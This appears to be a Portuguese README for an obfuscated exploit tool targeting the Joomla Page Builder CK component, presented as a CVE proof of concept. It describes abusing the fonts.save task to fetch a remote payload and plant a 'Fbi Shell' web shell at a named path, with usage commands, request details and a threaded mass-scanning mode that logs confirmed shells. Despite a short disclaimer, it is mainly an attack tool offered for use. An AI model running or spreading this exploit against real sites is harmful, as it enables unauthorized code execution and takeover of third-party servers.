
Page Builder CK for Joomla - Explorador de SSRF não autenticado / Escrita Remota de Arquivo levando à execução de PHP
BlackHat Team scanner de prova de conceito para a vulnerabilidade fonts.save do Joomla Page Builder CK.
POC CVE-2026-56290
Autor: @mrzblackhat
Equipe: BlackHat Team
Créditos: Peyman Siyahi · MR.PERSIA
Esta ferramenta sonda sites Joomla que executam o componente vulnerável com_pagebuilderck. Ela abusa da tarefa fonts.save para buscar um payload remoto e grava um web shell em:
media/com_pagebuilderck/gfonts/fbi.php
A RCE é confirmada quando o shell enviado responde com um <title> HTML contendo Fbi Shell.
Suporta varredura de alvo único e em massa com workers em threads e salvamento instantâneo dos acertos.
requestsurllib3pip install requests urllib3
python3 poc.py --url https://example.com --insecure
python3 poc.py --mass targets.txt --insecure --threads 20 --timeout 12
targets.txt — uma URL por linha. Linhas após # são ignoradas.
| Flag | Descrição |
|---|---|
--url URL | Escaneia um único alvo |
--mass FILE | Escaneia alvos a partir de um arquivo |
--insecure | Ignora a verificação do certificado TLS |
--threads N | Threads de trabalho para o modo em massa (padrão: 20) |
--timeout N | Tempo limite HTTP em segundos (padrão: 12) |
--output FILE | Salva URLs de shell confirmados (padrão: hits.txt) |
Fbi ShellURLs de shell confirmados são adicionadas ao arquivo de saída imediatamente.
| Arquivo | Descrição |
|---|---|
poc.py | Build de lançamento ofuscada (execute este) |
hits.txt | Saída padrão para shells confirmados |
python3 _build_obf.py
POST para index.php com option=com_pagebuilderck&task=fonts.savefont.css aciona a gravação do shell em gfonts/fbi.phpGET para o caminho do shell e verifica se o <title> contém Fbi ShellEsta ferramenta é fornecida apenas para pesquisa de segurança autorizada e testes de penetração.
O acesso não autorizado a sistemas de computador é ilegal. Os autores e a BlackHat Team não são responsáveis pelo uso indevido. Teste apenas sistemas que você possua ou para os quais tenha permissão explícita por escrito para avaliar.
@mrzblackhatBlackHat Team — Peyman Siyahi · MR.PERSIA
Pesquisa e ferramenta originais por @mrzblackhat. Não redistribua cópias modificadas sem atribuição.